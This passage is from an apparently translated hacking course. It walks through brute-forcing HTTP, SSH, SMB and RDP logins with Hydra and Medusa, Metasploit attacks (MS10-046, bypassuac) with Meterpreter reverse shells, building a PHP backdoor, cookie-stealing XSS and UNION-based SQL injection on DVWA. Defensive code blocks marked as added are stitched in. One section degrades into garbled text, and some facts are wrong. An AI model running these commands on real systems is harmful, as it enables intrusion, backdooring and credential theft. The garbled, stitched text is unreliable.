A tool that lets us write and read data over TCP and UDP. Netcat can be used as a port scanner, backdoor, port redirector, port listener, ...
Using netcat from the command line:
- Connect mode: nc [-options] hostname port1[-port2]
- Listen mode: nc -l -p port [-options] [hostname] [port]
Example:
Grab a server's banner:
nc -n 192.168.10.102 80 (port 80)
Port scanning
Run netcat with the -z option. For example, scanning TCP ports 1-500 of host 192.168.10.102. A verbose connection to a single port looks like this:
nc -v www.google.com 80
www.google.com [74.215.71.105] 80 (http) open
c) OpenSSL
A collaborative effort to develop a robust, full-featured open-source toolkit implementing the SSL (version 2 and version 3) and TLS (version 1) protocols, managed by a worldwide community of volunteers who use the Internet to communicate, plan and develop the OpenSSL toolkit and its related documentation.
Most software such as IMAP & POP, Samba, OpenLDAP, FTP, Apache and others require the user to be authenticated before the service may be used. By default, however, the user's identity and password are transmitted as plain text, so they can be read or altered by someone else. Encryption techniques such as SSL guarantee the safety and integrity of the data: with this technique, information travelling over the network is encrypted end to end. Once OpenSSL is installed on a Linux server, we can use it as a third-party tool that lets other applications use SSL features.
OpenSSL is a cryptographic toolkit implementing the SSL and TLS network protocols and the related cryptographic standards. The openssl program is a command-line tool for using the cryptographic functions of OpenSSL's crypto library from the shell. OpenSSL provides libraries that supply cryptographic functions to applications such as secure web servers.
It is open-source software that can be used for both commercial and non-commercial purposes, with strong encryption available worldwide; it supports the SSLv2, SSLv3 and TLSv1 protocols, both RSA and Diffie-Hellman ciphers, and DSO support. Support for OpenSSL and RSAref (US), improved passphrase handling for private keys, X.509 certificate-based authentication for both client and server, support for X.509 certificate revocation lists, and per-URL adjustability of the SSL handshake parameters.
2. DNS Enumeration
DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. A company may have both internal and external DNS servers that can yield information such as user names, computer names and IP addresses of potential target systems. There are many tools that can be used to obtain information for DNS enumeration. Examples of tools that can be used for DNS enumeration are nslookup, DIG, the American Registry for Internet Numbers (ARIN) and Whois. To enumerate DNS, we must understand DNS and how it works.
We must have knowledge of DNS records. The list of DNS records gives an overview of the types of resource records (database records) stored in the zone files of the Domain Name System (DNS). DNS implements a distributed, hierarchical and redundant database of information associated with Internet domain names and addresses. In these domain servers, different record types are used for different purposes. The following list describes the common DNS record types and their use:
A (address) - maps a hostname to an IP address
SOA (Start of Authority) - identifies the DNS server responsible for the domain's information
CNAME (canonical name) - provides additional names or aliases for the address record
MX (mail exchange) - identifies the mail server for the domain
SRV (service) - identifies services such as directory services
PTR (pointer) - maps an IP address to a hostname
NS (name server) - identifies other name servers for the domain
A DNS zone transfer is typically used to replicate DNS data across a number of DNS servers, or to back up DNS files. A user or server performs a specific zone transfer request from a name server. If the name server allows zone transfers to occur, all the DNS names and IP addresses hosted by that name server are returned as human-readable ASCII text.
Nslookup
We can also run the command directly as follows:
nslookup -type=any tuoitre.vn
type is the record type, as listed above: NS (name server), MX (mail exchange), any (all).
tuoitre.vn: a domain
3. NetBIOS name
NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model, allowing applications on separate computers to communicate over a local area network. Strictly an API, NetBIOS is not a networking protocol. Older operating systems ran NetBIOS over IEEE 802.2 and IPX/SPX using the NetBIOS Frames (NBF) and NetBIOS over IPX/SPX (NBX) protocols, respectively. In modern networks, NetBIOS normally runs over TCP/IP via the NetBIOS over TCP/IP (NBT) protocol. This results in each computer in the network having both a NetBIOS name and an IP address corresponding to a (possibly different) host name.
A NetBIOS name is the naming mechanism for resources in a system that uses a flat namespace (there is no concept of hierarchy).
Chapter 5: PASSWORD CRACKING
I. Introduction
Password cracking is the process of finding or recovering a password, for a variety of purposes. The aim of password cracking is to help a user recover a forgotten password, or to gain unauthorized access to a system.
II. Password Cracking Techniques
1. Dictionary Attacks/Hybrid Attacks
The attack uses a prebuilt dictionary file containing hashes and compares them with the hash of the password, recovering the plaintext password when the hashes match.
We can also add to or permute the words in the dictionary (hybrid attacks). This type works well when the password consists of ordinary words; it is fast, and its success rate depends on the dictionary.
2. Brute Forcing Attacks
Every combination of all characters is hashed and compared. Success is guaranteed given enough time, but cracking is very slow when the password is long and complex. It is only good for short passwords.
3. Syllable Attacks/Pre-Computed Hashes
These combine the two approaches above by precomputing hash tables of all character combinations and only comparing during the cracking process. Cracking takes only a few minutes if the hash tables are already available.
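The three techniques above all reduce to comparing digests, which is why how a password is stored decides how much they cost. The added example below (not from the document) contrasts a pre-computed table against unsalted MD5 with salted, iterated PBKDF2; the wordlist and iteration count are constructed for illustration.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for a dictionary file such as password.txt.
WORDLIST = ["123456", "password", "12345", "qwerty", "letmein", "admin"]
ITERATIONS = 100_000


def build_precomputed_table(words, algo="md5"):
    """Pre-computed hash attack: hash every dictionary word once and index the
    digests, so a later crack is a single lookup instead of a hash per guess."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in words}


def lookup_in_table(digest_hex, table):
    """Dictionary / pre-computed attack against an unsalted fast hash:
    a hit returns the plaintext, a miss returns None."""
    return table.get(digest_hex)


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Defender's side: salted, iterated PBKDF2-HMAC-SHA256. A random per-user
    salt means one table cannot serve all users; the iteration count makes
    every guess cost ITERATIONS hash calls rather than one."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password, salt, stored_digest, iterations=ITERATIONS):
    """Recompute the digest and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, stored_digest)


def table_recovers(password, table):
    """True if an unsalted MD5 of `password` is cracked by a table lookup."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return lookup_in_table(digest, table) == password


def salted_digests_differ(password):
    """Same password for two users, two salts: the stored digests are
    unrelated, which is what defeats a shared pre-computed table."""
    _, d1 = hash_password(password)
    _, d2 = hash_password(password)
    return d1 != d2
```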
III. Common Attack Types
1. Active Password Cracking
Find a real username, then search for the password of that username. The process can be automated to speed up the search.
Forms of active password cracking:
o Password guessing: uses a dictionary of words and attacks the password by trying all combinations in order to crack it. This kind of attack takes a lot of time and network bandwidth and is easily detected.
o Trojan/Spyware/Keylogger: background programs that let the attacker record every key pressed (keylogger); secretly gather information about individuals and organizations (spyware); and, with the help of a Trojan, gain access to stored passwords, read private documents or delete files.
2. Passive Password Cracking
Capture the login process on the wire and break the password offline (sniffing, MITM).
These attacks include:
o Wire sniffing: the attacker runs packet-sniffing tools on the LAN to access and record live network traffic. The captured data may include passwords sent to remote systems in Telnet, FTP and rlogin sessions and in e-mail sent and received.
o Man-in-the-Middle (MITM) and replay attack: in a MITM attack the attacker gains access to the communication channel between victim and server to look for information; in a replay attack, packets and authentication tokens are captured with a sniffer.
3. Offline Password Cracking
Physical access to the victim's computer is used to copy the files that store credentials. For example, the SAM database on Windows (%systemroot%/system32/config) or /root/passwd on Linux. John can then be used to recover the plaintext password.
IV. Password Cracking Tools
1. Hydra
a) Introduction
Hydra is a very fast network logon cracker that supports many different protocols and services.
Hydra is a parallelized login cracker, meaning it runs many tasks at the same time so that cracking finishes faster.
This tool lets researchers and security consultants show how easy it would be to gain unauthorized remote access to a system.
b) Usage
The general syntax of Hydra is:
hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t TASKS] [-w WAIT] [server | IP] [service://server[:port]]
Example:
hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1
Where:
-f: finish: stop as soon as the first valid username/password pair is found
-L: username file (-l for a single username)
-P: password file (-p for a single password)
192.168.10.1: the IP address whose login password is to be cracked
http-get: the HTTP service on port 80 (http is replaced by http-get and http-head)
http://192.168.10.1 is the web page used for the cracking process.
2. Medusa
a) Introduction
Medusa can be used for fast, parallel, modular brute-force logins. Its goal is to support as many services that allow remote authentication as possible.
Medusa is designed around the following three features:
Thread-based parallel testing: it can test many hosts, usernames and passwords at once.
Modular design: each service exists as an independent module file (.mod). We do not need to modify the core to extend the list of services supported for brute-forcing.
b) Usage
Syntax:
medusa [-h host | -H file] [-u username | -U file] [-p password | -P file] [-C file] -M module [OPT]
-h host or IP address, -H file containing hosts
-u username, -U file containing usernames
-p password, -P file containing passwords
-C file combining host, username and password in the form host:username:password
-M module is required and is followed by the name of a supported module. To list all modules type: medusa -d, and for detailed usage of a given module: medusa -M module_name -q
V. Password Cracking on Protocols
1. HTTP (HyperText Transfer Protocol)
a) Concept
This is the hypertext transfer protocol, commonly used for web applications (World Wide Web, WWW) on the default port 80.
b) There are two forms of HTTP authentication:
Basic access authentication: a method by which a web browser or other program supplies a username and password when asked. It is supported by every web browser; however, because the username and password are sent as plain text, it is rarely used in practice. Logging in to a router is a typical example.
We can use Wireshark to capture it:
As the picture shows, the captured username and password are admin:12345
Digest access authentication: one of the agreed methods by which a web server can negotiate credentials with the user's web browser. It applies a hash function to the sensitive information before sending it over the network.
c) Cracking HTTP passwords
We can use nmap (Network Mapper) to scan for open ports:
Open the page in a browser to check the authentication process.
On pressing Cancel we get the message:
In a Terminal on BackTrack 5, type: hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1
Where:
-f: finish: stop as soon as the first valid username/password pair is found
-L: username file (-l for a single username)
-P: password file (-p for a single password)
192.168.10.1: the IP address whose login password is to be cracked
http-get: the HTTP service on port 80 (http is replaced by http-get and http-head)
http://192.168.10.1 is the web page used for the cracking process.
Or: medusa -h 192.168.10.1 -U login.txt -P password -M http
Where:
-h: the host or IP address whose login password is to be cracked
-U: username file (-u for a single username)
-P: password file (-p for a single password)
-M http: the protocol to crack; M is short for module
Then return to the web browser and enter the username and password that were found:
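From the server's side, the Hydra and Medusa runs above leave a dense burst of 401 responses from one client, followed by a 200 once a guess lands, and the Basic credential seen in Wireshark is only base64. The added example below (not from the document) detects that pattern in constructed Apache-style access log lines and decodes the captured header; the log contents and thresholds are assumptions.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed access log: twelve rejected logins in twelve seconds from one
# client, then its success, plus an ordinary user who mistyped once.
BURST = "\n".join(
    f'192.168.10.102 - - [12/Aug/2012:10:15:{s:02d} +0700] "GET / HTTP/1.0" 401 381'
    for s in range(1, 13)
)
SAMPLE_LOG = BURST + "\n" + "\n".join([
    '192.168.10.102 - admin [12/Aug/2012:10:15:14 +0700] "GET / HTTP/1.0" 200 1024',
    '192.168.10.55 - - [12/Aug/2012:10:16:40 +0700] "GET / HTTP/1.0" 401 381',
    '192.168.10.55 - admin [12/Aug/2012:10:16:45 +0700] "GET / HTTP/1.0" 200 1024',
])


def parse_access_log(text):
    """Parse common-log-format lines; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entries.append({
            "ip": m["ip"],
            "user": None if m["user"] == "-" else m["user"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "status": int(m["status"]),
        })
    return entries


def find_bruteforce_sources(entries, threshold=10, window_seconds=60):
    """Flag clients with at least `threshold` 401s inside any window of
    `window_seconds`, and record whether an authenticated 200 followed the
    burst (the guess succeeded and the account should be treated as exposed)."""
    by_ip = defaultdict(list)
    for e in sorted(entries, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)
    hits = {}
    for ip, evs in by_ip.items():
        fails = [e["ts"] for e in evs if e["status"] == 401]
        best, start = 0, 0
        for end in range(len(fails)):          # sliding window over failures
            while (fails[end] - fails[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            last_fail = fails[-1]
            success = any(e["status"] == 200 and e["user"] and e["ts"] > last_fail
                          for e in evs)
            hits[ip] = {"failures_in_window": best, "success_after_burst": success}
    return hits


def decode_basic_credentials(header_value):
    """What a sniffer recovers from 'Authorization: Basic <base64(user:pass)>'."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password
```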
2. SSH (Secure Shell)
a) Concept
SSH is a network protocol for secure data communication, remote shell services or command execution, and other secure network services between networked computers. It connects a server and a client (running the SSH server and SSH client programs) through a secure channel over an insecure network.
The best-known application of the protocol is access to shell accounts on Unix-like operating systems (Linux). It was created to replace insecure protocols such as telnet, rsh and rexec, in which the password is sent as plain text and can easily be read.
SSH runs on TCP port 22.
b) Cracking passwords over SSH
Check whether the ssh service is running:
With hydra: hydra -f -L login.txt -P password.txt 192.168.10.101 ssh
With Medusa: medusa -h 192.168.10.101 -U login.txt -P password.txt -M ssh
And here is how a Nokia N900 device is accessed remotely with the username and password just found:
For example, checking the network cards remotely:
3. SMB (Server Message Block)
a) Concept
SMB, also known as the Common Internet File System (CIFS), operates at the application layer of the OSI model and is commonly used to provide shared access to files, printers and miscellaneous communication between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most uses of SMB involve Microsoft Windows.
SMB can run on the session layer or lower:
o Directly on TCP port 445;
o Via NetBIOS (which provides services related to the session layer of the OSI model, allowing applications on separate computers to communicate over a LAN) on UDP ports 137 and 138 and TCP ports 137 and 139
b) Cracking SMB passwords
Scan whether any machine is running the smb service on port 445:
With Hydra we type: hydra -f -L login.txt -P password.txt 192.168.10.100 smb
With Medusa we type: medusa -h 192.168.10.100 -U login.txt -P password.txt -M smbnt
And here is how we use the username and password just found:
4. RDP (Remote Desktop Protocol)
a) Concept
RDP is a proprietary protocol developed by Microsoft that gives a user a graphical interface to another computer.
Microsoft currently refers to its official RDP server software as Remote Desktop Services, formerly Terminal Services, and to the client software as Terminal Services Client.
When connecting to a remote computer, we are asked for a matching username and password. So cracking the RDP password is needed if we want access without the user's consent.
RDP runs on TCP port 3389.
b) Cracking RDP passwords
Scan whether any computer has port 3389 open:
With Hydra: hydra -f -L login.txt -P password.txt 192.168.10.100 rdp -t 4 -w 1
Medusa does not support RDP directly. However, we can use the wrapper module with rdesktop as the script, as follows:
medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -h 192.168.10.100 -U login.txt -P password.txt
Even so, this does not yet work properly and is time-consuming, because the attacker has to enter each password by hand.
Here is how rdesktop is used to control the remote computer with the username and password found:
Chapter 6: SYSTEM HACKING
I. INTRODUCTION TO METASPLOIT
1. Introduction
Metasploit is a computer security project that provides information about security vulnerabilities and aids penetration testing and the development of intrusion detection systems. Its best-known sub-project is the Metasploit Framework.
The Metasploit Framework is an environment for testing, attacking and exploiting bugs in services. Metasploit was built in the object-oriented language Perl, with components written in C, assembler and Python. Metasploit runs on most operating systems: Linux, Windows, MacOS. We can download the program at www.metasploit.com
The current version of Metasploit is 4.4.
2. Components of Metasploit
Metasploit supports several user interfaces:
Console interface: the msfconsole command. The msfconsole interface uses the command line for configuration and testing, which is faster and more flexible
Web interface: msfweb, interacting with the user through a web interface
Command line interface: msfcli
Environment:
Global environment: managed through the two commands setg and unsetg; options set here are global and are applied to all exploit modules
Temporary environment: managed through the two commands set and unset; this environment applies only to the exploit module currently loaded and does not affect other exploit modules
We can save the environment we have configured with the save command. The environment is saved in ./msf/config and loaded again when the user interface is started
3. Using the Metasploit Framework
a) Choose an exploit module
Select the vulnerable program or service that Metasploit supports exploiting
show exploits: list the exploit modules the framework supports
use exploit_name: select an exploit module
info exploit_name: view information about the exploit module
We should regularly update the service vulnerabilities and modules from www.metasploit.com, or with the msfupdate command, or with svn update /opt/metasploit/msf3/
b) Configure the chosen exploit module
show options: determine which options need to be configured
set: configure the module's options
Some modules have advanced options, which we can view with the command show advanced
c) Verify the configured options
check: check whether the options have been set correctly.
d) Choose the target
Choose which operating system to run against
show targets: the targets provided by the module
set: specify the target
e.g.: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) Choose the payload
The payload is the code that will run on the remote system; it is the part of a computer virus that executes malicious code.
show payloads: list the payloads of the current exploit module
info payload_name: view detailed information about a payload
set payload payload_name: select a payload by module name. After choosing a payload, use show options to view the payload's options
show advanced: view the payload's advanced options
f) Run the exploit
exploit: the command that runs the payload code. The payload will then give us information about the exploited system
4. Introduction to the Meterpreter payload
Meterpreter, short for Meta-Interpreter, is an advanced payload in the Metasploit Framework. Its purpose is to provide command sets for exploiting and attacking remote computers. Its developers wrote it as shared object (DLL) files. Meterpreter and its extensions execute in memory and are never written to disk, so they can avoid detection by anti-virus software.
Meterpreter provides command sets we can use on remote computers:
Fs (Filesystem): interaction with the filesystem
Net: view the remote machine's network information, such as IP and routing table
Process: interact with processes on the remote machine
Sys: view system and environment information of the remote machine
a) Using the Fs module
cd directory: like the command-line cd, changes the working directory
getcwd: shows the current working directory
ls: lists directories and files
upload src1 [src2 ...] dst: upload files from src to dst.
download src1 [src2 ...] dst: download files from src to dst.
b) Using the Net module
ipconfig: view the network adapter configuration of the remote computer
route: view the routing table of the remote machine
c) Using the Process module
execute -f file [ -a args ] [ -Hc ]: the execute command creates a new process on the remote machine and uses that process to extract data
kill pid1 pid2 pid3: kill or stop processes running on the remote machine
ps: list the processes of the remote machine
d) Using the Sys module
getuid: shows the current username on the remote machine
sysinfo: shows information about the victim computer: operating system, version, 32-bit or 64-bit platform
5. Countermeasures
Regularly apply Microsoft's patches. For example, so that Metasploit cannot exploit the Lsass_ms04_011 bug, we must apply Microsoft's patch. According to Microsoft's assessment this is a critical bug present in almost all Windows operating systems. We should use hotfix number 835732 for this bug.
II. The MS10-046 (2286198) vulnerability
1. Introduction
This is a critical vulnerability in the Windows Shell of all the affected operating systems; it allows an attacker to take complete control of Windows and execute code remotely. The bug was discovered in June 2010, and in August 2010 Microsoft released a patch.
The dangerous bug lies in Windows "shortcut" (*.lnk) files, which usually sit on the desktop or in the Start menu. By creating a shortcut file that embeds malicious code, a hacker can have that code executed automatically when the user views the shortcut or the contents of a folder containing the malicious shortcut.
The affected Windows versions include:
Operating system
- Windows XP Service Pack 3
- Windows XP Professional x64 Edition Service Pack 2
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 with SP2 for Itanium-based Systems
- Windows Vista Service Pack 1 and Windows Vista Service Pack 2
- Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
- Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
- Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
- Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
- Windows 7 for 32-bit Systems
- Windows 7 for x64-based Systems
- Windows Server 2008 R2 for x64-based Systems*
- Windows Server 2008 R2 for Itanium-based Systems
2. Attack steps:
After booting BackTrack and logging in successfully, we open a Terminal:
Then type msfconsole and press Enter:
To find the module for ms10-046: search ms10-046 and press Enter
Then type:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader and press Enter
Use the command show options to see the parameters needed to carry out the attack:
o SRVHOST: the attacker's machine address, which listens for victims connecting to it
o SRVPORT: the listening port, by default http (80)
We then run:
o set PAYLOAD windows/meterpreter/reverse_tcp
o set SRVHOST 192.168.1.200
o set the lhost IP address: set LHOST 192.168.1.200. LHOST is a parameter of the PAYLOAD we just set.
exploit to start the listening server on the attacking machine
On the victim's computer, create a shortcut by right-clicking the Desktop -> New -> Shortcut
Enter the attacking machine's address in "Type the location of the item": http://192.168.1.200/anything and choose Next
Name the newly created shortcut and click Finish. We then open this shortcut:
After a moment, on the attacking machine we get:
Use the sessions command to view the sessions Metasploit currently has:
To interact with a session we run: sessions -i 1 (1 is the session id)
From now on everything becomes easier, as the attacker has full control of the victim machine. For example:
The sysinfo command gets the victim machine's information:
The hashdump command gets the users' passwords as hashes
A very useful command for using cmd (the command line): shell
3. Countermeasures
Regularly apply Windows patches to avoid being exploited by hackers.
The patch, code-named KB2286198, contains a new version of the Shell32.dll file and is a critical update. Shell32.dll is a very important library in Windows: it contains a number of Windows Shell API functions. If Shell32.dll is faulty or wrongly updated, the computer will show the "Blue Screen of Death".
III. The BYPASSUAC vulnerability
1. Introduction
From Windows Vista onward, Microsoft introduced a built-in utility called User Access Control (UAC). UAC increases the security of Windows by limiting application software to standard user privileges. Therefore only software the user trusts receives administrative privileges; other software does not. However, even under an administrator account, applications are restricted just as under ordinary accounts.
Every operating system with built-in User Access Control is affected and can be exploited.
2. Attack steps
In a Terminal, type msfconsole and press Enter:
use exploit/multi/handler. This module provides many functions of the Metasploit payload system for us to exploit, for instance by running run post/windows/escalate/bypassuac as in this example, and much more.
set PAYLOAD windows/meterpreter/reverse_tcp: allows the victim to connect back to the attacking machine for easy control.
set LHOST 192.168.1.202: the listening host, the IP address of the attacking machine
set LPORT 6789: the listening port, any port that is not already in use.
exploit to start the server.
We will create a backdoor that connects to the server we started earlier.
After creating it, we copy the file backdoor.exe to the victim computer and run it. We can use Samba to share files between Windows and Linux.
On the Windows computer, we share the file with full access:
Back on the victim computer, run the copied backdoor.exe. Then on the victim computer we receive the following:
We have a session but not yet full control. To obtain it we run: run post/windows/escalate/bypassuac
We can see all supported commands with the command: help
3. Countermeasures
Unfortunately, up to now Microsoft has neither acknowledged the bug in UAC nor provided a patch for this vulnerability. A Microsoft spokesperson asserted that there is no vulnerability in UAC. Therefore we need to install reputable anti-virus and anti-backdoor software to avoid being exploited.
Chapter 7: WEB HACKING WITH DVWA
I. Introduction
For those of us just starting to study hacking, a test environment is very important, but finding a realistic environment suited to our level is not simple.
Conversely, those with hacking skill and experience surely also want to test how far their skills go and improve them further.
DVWA (Damn Vulnerable Web Application) can meet the needs of both newcomers and those with a certain level of skill. DVWA is a framework with pre-built security holes following the OWASP Top 10 web security weaknesses. Its levels, from low to high, can satisfy the hacking needs of a great many people.
So DVWA is a vulnerable PHP/MySQL web application. Its main goals are to help security professionals test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers and students teach and learn web application security in a classroom environment.
II. Installing DVWA on BackTrack
Since this is a PHP-based framework, we simply set up a web server with XAMPP first, then copy DVWA into it, and use DVWA through the web interface.
1. Download and install XAMPP
Since it is open-source software, go to the XAMPP home page http://www.apachefriends.org/en/xampp.html and download the latest version.
After downloading XAMPP, open a Terminal and type the command shown in the picture below
Start XAMPP
Finally, open a web browser and type http://localhost to get the XAMPP main page as in the picture below:
2. Download and install DVWA
Go to http://www.dvwa.co.uk/ to download DVWA
Then extract the downloaded file and place it in the directory /opt/lampp/htdocs/
In a web browser, type http://localhost/dvwa/ to get the DVWA main page as follows:
Note:
XAMPP must be started before DVWA can run.
At the DVWA login page, log in with the default account/password admin/password.
Preparation before attacking:
Open a web browser and type: localhost/dvwa. ip_address/dvwa can also be used
To exploit the bugs in DVWA (XSS, SQL Injection), we must set the Security Level to Low. At that level, the code we inject is kept intact. At High, the htmlspecialchars() function converts special characters, so the input is no longer the same as what was entered. At Medium, the string <script> is removed so it has no effect; other HTML tags, however, still take effect as usual.
So we set the Security Level to low: choose DVWA Security -> Low -> Submit
III. Attack techniques on DVWA
1. XSS (Cross-Site Scripting)
a) Introduction
Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with HTML's Cascading Style Sheets), is an attack technique that injects into dynamic websites (ASP, PHP, CGI, JSP ...) HTML tags or dangerous script code that can harm other users. The dangerous code injected is mostly written in client-side scripting languages such as JavaScript, JScript and DHTML, and may also consist of HTML tags.
XSS is one of the common bugs; a great many websites suffer from it, which is why more and more people are paying attention to it!
b) Classification of XSS
XSS can be classified as follows:
Stored XSS Attacks
Stored XSS is a form of attack that lets the attacker insert a dangerous script (usually JavaScript) into our website through some function (e.g. comments, guestbook, posting), so that when other members visit the website they are hit by the attacker's malicious code; this code is usually kept in the website's database, hence the name Stored. Stored XSS arises because we do not properly filter the data members submit, allowing the malicious code to be saved in the website's database.
Reflected XSS Attacks
In this form, the attacker typically appends malicious code to the URL of our website and sends it to the victim; if the victim visits that URL, they are hit by the malicious code. This happens because we do not filter the input coming from our website's URL.
XSS Attack Consequences
This method is similar to the two above. The difference is how the payload is delivered to the server. Even a read-only or brochureware site is vulnerable to XSS. XSS can cause damage ranging from minor to severe, such as taking over a user's account. An XSS attack can steal the session cookie and cost the user their account. It can also affect end-user data by installing a Trojan, redirecting visitors to another page, or changing the content of a page.
c) How XSS works
Basically, the operation of XSS can be described as follows:
[Figure: how XSS works]
By the principle above, a hacker can exploit a website's security holes. Any HTML tag can be a tool for an XSS attack; among them, the IMG and IFRAME tags can make the browser load other websites while the HTML is being rendered. Exploiting this principle, hackers can insert malicious code and subject the victim machine to an XSS attack
d) Harm done by XSS
XSS is commonly used for the following purposes:
Stealing information
Giving the hacker access to sensitive information
Getting free access to content that should only be available after payment
Snooping on the interests of network users
Changing the appearance of (defacing) a website
Denial-of-service (DoS) attacks
Malicious JavaScript can access any of the following:
- Persistent cookies (of the XSS-vulnerable site) kept by the browser.
- RAM (session) cookies (of the XSS-vulnerable site).
- The names of all windows opened from the XSS-vulnerable site.
- Any information accessible from the current DOM (such as values and HTML code).
e) Tn cng XSS
Thc hin script: alert(XSS); hin thng bo trn trnh
duyt web
Kt qu nhn c thay v ch lu vo c s d liu:
Xem cookie ca ngi dng:
alert(document.cookie);
-
96
Chng ta c th gi cookie ny v trc tip my tn cng thay v ch hin ln
mn hnh.
Chng ta c th chn cc th iframe vo:
In addition, we can use the Metasploit Framework (introduced above) to take control of
the target, together with a backdoor that makes the target machine connect back to us.
Command to create the backdoor:
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.102 LPORT=4444 R > forum.php
Use msfconsole and set the parameters needed to listen for the incoming connection on the
attacker's server:
Back in Stored XSS, we use the script:
Once the script above has executed, the Metasploit Framework receives the connection and
we can proceed with the attack.
Some screenshots of the attack:
f) Some methods of prevention and mitigation
The danger of XSS cannot be fully measured, yet preventing it is not especially hard, and
there are many ways to address the problem. OWASP (the Open Web Application Security
Project) states that to build a secure website, user-supplied data should be handled as
follows:
Accept only valid data.
Reject bad data.
Continuously check and sanitize data.
Web developers can protect their sites from exploitation through XSS by making sure that
dynamically generated pages contain no script tags: filter and validate the input coming
from the user, and encode and filter the values that are output to the user.
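An added example (not code from the Athena document or from DVWA) of the two measures named above, input validation and output encoding, applied to a guestbook like DVWA's. The comment list is constructed; its first two entries are the payloads used in the attack section, and the iframe target reuses the attacker host from this chapter.

```python
"""Stored XSS: the rendering defect beside its fix (validation plus output encoding)."""
import html
import re

# Constructed guestbook contents: the first two are the payloads from the attack section,
# the third an iframe pointing at the attacker host used in this chapter.
GUESTBOOK = [
    ("guest", "<script>alert('XSS')</script>"),
    ("guest", "<script>alert(document.cookie)</script>"),
    ("guest", '<iframe src="http://192.168.10.102/forum.php" width="0" height="0"></iframe>'),
    ("Mai", "Nice site! <3"),
]

# Input validation (OWASP: accept known-good). A name has a small legitimate alphabet,
# so a strict pattern fits; free text such as a comment cannot be validated this way
# and must rely on encoding at output time instead.
NAME_RE = re.compile(r"^[A-Za-z0-9 _.'-]{1,40}$")


def validate_name(name: str) -> bool:
    return NAME_RE.fullmatch(name) is not None


def render_vulnerable(name: str, comment: str) -> str:
    """DVWA low-level style: user data is pasted straight into the HTML."""
    return f"<p><b>{name}</b>: {comment}</p>"


def render_safe(name: str, comment: str) -> str:
    """Output encoding for the HTML body context: < > & " ' become entities, so the
    browser displays the payload as text instead of parsing it as markup."""
    return f"<p><b>{html.escape(name, quote=True)}</b>: {html.escape(comment, quote=True)}</p>"


# Crude check used only to make the difference visible: does the rendered fragment
# still contain an element or event-handler attribute the browser would execute?
ACTIVE_MARKUP = re.compile(r"<\s*(script|iframe|img|svg|object|embed)\b|\bon[a-z]+\s*=", re.I)


def contains_active_markup(fragment: str) -> bool:
    return ACTIVE_MARKUP.search(fragment) is not None


def count_active(entries, renderer) -> int:
    """How many guestbook entries still render as executable markup."""
    return sum(contains_active_markup(renderer(n, c)) for n, c in entries)


if __name__ == "__main__":
    for name, comment in GUESTBOOK:
        print("vulnerable:", render_vulnerable(name, comment))
        print("safe      :", render_safe(name, comment))
    print("active with vulnerable renderer:", count_active(GUESTBOOK, render_vulnerable))
    print("active with safe renderer      :", count_active(GUESTBOOK, render_safe))
```

The encoding has to match the context the value lands in: html.escape is correct for the HTML body and for quoted attribute values, but a value placed inside a JavaScript string or a URL needs that context's own encoding, and a value placed in an unquoted attribute is unsafe no matter how it is escaped.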
2. SQL Injection
a) What is SQL Injection?
SQL Injection is one of the web hacking techniques that is becoming increasingly common.
By injecting SQL queries/commands into the input before it is passed to the web
application for processing, we can log in without a username and password, execute
commands remotely, dump data and even obtain root on the SQL server. The attack tool is
an ordinary web browser such as Internet Explorer, Firefox or Google Chrome.
b) Steps to exploit the vulnerability in the web page
Go to http://localhost/dvwa/ and choose SQL Injection (Blind):
We start exploiting the flaw from the User ID input field:
Enter: 1
If we instead enter 1' or 1=1# or 1' or ''=''# we get a rather surprising result:
The # character comments out the trailing quote (') at the end of the SQL query:
SELECT first_name, last_name FROM users WHERE user_id = '$user_id'
Show the name of the current database: a' UNION select 1, database();#
Show the user and system user: a' UNION select system_user(), user();#
Determine the user name the application connects with and the MySQL version.
List all database names together with their tables in the MySQL server:
a' UNION select table_schema, table_name from information_schema.tables;#
We can add a WHERE clause to narrow the result:
a' UNION select table_schema, table_name from information_schema.tables where table_schema='dvwa';#
List the columns of the tables:
a' UNION select table_name, column_name from information_schema.columns where table_schema='dvwa';#
Next, run the following statement (the first selected string holds the PHP code that
executes the value of the cmd parameter; its content is not shown here):
